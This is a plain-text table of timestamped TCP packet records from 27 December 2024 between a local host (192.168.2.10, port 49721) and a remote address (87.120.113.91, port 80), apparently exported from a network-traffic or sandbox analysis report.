                                                        Dec 27, 2024 14:53:46.756325960 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.782602072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.782725096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.782778978 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.783024073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.783047915 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.783091068 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.783837080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.783927917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.783968925 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.784638882 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.796761036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.796776056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.796828985 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.796998978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.797034979 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.797136068 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.797833920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.797878981 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.797944069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.798603058 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.798645020 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.798686028 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.799454927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.799494028 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.799552917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.800259113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.800297976 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.800373077 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.801084995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.801124096 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.801292896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.801917076 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.801954031 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.802016973 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.802912951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.802953005 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.803076029 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.803529978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.803571939 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.803622007 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.804339886 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.804374933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.804414034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.805175066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.805212975 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.805270910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.805989981 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.806034088 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.806093931 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.806788921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.806830883 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.806916952 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.807621002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.807657003 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.807719946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.808417082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.808456898 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.808531046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.809283972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.809323072 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.809395075 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.810050964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.810090065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.810153961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.810894966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.810935974 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.810956001 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.811659098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.811707020 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.811774969 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.812519073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.812556028 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.812613010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.813390017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.813436031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.813441038 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.814157009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.814198971 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.814260006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.814971924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.815010071 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.815115929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.815766096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.815808058 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.815891981 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.816584110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.816622019 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.816643000 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.817441940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.817451954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.817476988 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.865690947 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.884502888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.884675980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.884723902 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.884795904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.884879112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.884910107 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.885672092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.885747910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.885782003 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.886260033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.886359930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.886394024 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.887052059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.887175083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.887290001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.887962103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.888005018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.888042927 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.888735056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.888792992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.888828993 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.889556885 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.889638901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.889674902 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.890319109 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.890420914 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.890458107 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.891113997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.891220093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.891254902 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.891974926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.892093897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.892137051 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.892767906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.892859936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.892899036 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.893609047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.893719912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.893755913 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.894378901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.894500971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.894536018 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.895286083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.895364046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.895397902 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.896084070 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.896208048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.896241903 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.896964073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.897062063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.897095919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.897691965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.897783995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.897819042 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.898505926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.898570061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.898607969 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.899302959 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.899374962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.899409056 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.900091887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.900207043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.900243044 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.900955915 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.901027918 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.901062012 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.901798010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.901907921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.901943922 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.902574062 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.902590990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.902623892 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.983974934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.984071970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.984126091 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.984328985 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.984381914 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.984431982 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.985153913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.985236883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.985280991 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.985933065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.997989893 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.998044968 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.998097897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.998362064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.998404026 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.998420954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.999293089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.999335051 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.999350071 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.000015974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.000060081 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.000133991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.000840902 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.000885963 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.000946999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.001652002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.001694918 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.001739025 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.002531052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.002573967 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.002657890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.003334045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.003376961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.003443956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.004116058 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.004158974 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.004209995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.004942894 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.005036116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.005067110 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.005749941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.005788088 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.005805969 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.006567955 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.006601095 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.006658077 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.007371902 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.007421017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.007426023 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.008270979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.008311033 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.008327007 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.009073019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.009115934 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.009229898 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.009845972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.009887934 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.009968996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.010634899 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.010677099 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.010735035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.011493921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.011512041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.011535883 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.012284040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.012309074 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.012326956 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.013113022 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.013154030 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.013155937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.013952971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.013964891 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.013989925 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.014750004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.014789104 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.014816046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.015568018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.015588999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.015609980 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.016423941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.016436100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.016469002 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.017226934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.017265081 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.017313957 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.018007994 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.018044949 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.018129110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.018871069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.018909931 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.018959999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.068829060 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.086030006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.086060047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.086150885 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.086435080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.086484909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.086535931 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.087155104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.087256908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.087301016 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.087953091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.088021040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.088061094 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.088797092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.088901043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.088944912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.089616060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.089719057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.089761972 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.090534925 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.090641022 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.090679884 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.091239929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.091336966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.091392040 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.092072964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.092174053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.092217922 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.092878103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.092974901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.093020916 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.093683004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.093787909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.093835115 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.094491005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.094626904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.094667912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.095347881 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.095518112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.095558882 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.096148014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.096293926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.096338034 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.096967936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.097086906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.097126007 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.097774982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.097881079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.097923994 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.098573923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.098674059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.098714113 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.099370956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.099514961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.099554062 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.100227118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.100398064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.100438118 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.101037979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.101156950 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.101202965 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.101839066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.101948023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.101991892 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.102654934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.102756977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.102802992 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.103482962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.103530884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.103579044 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.104278088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.149775982 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.185440063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.185529947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.185652018 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.185672045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.185745001 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.185791969 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.186531067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.186649084 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.186690092 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.187338114 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.199637890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.199657917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.199703932 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.199995995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.200038910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.200071096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.200776100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.200814009 CET4972180192.168.2.1087.120.113.91
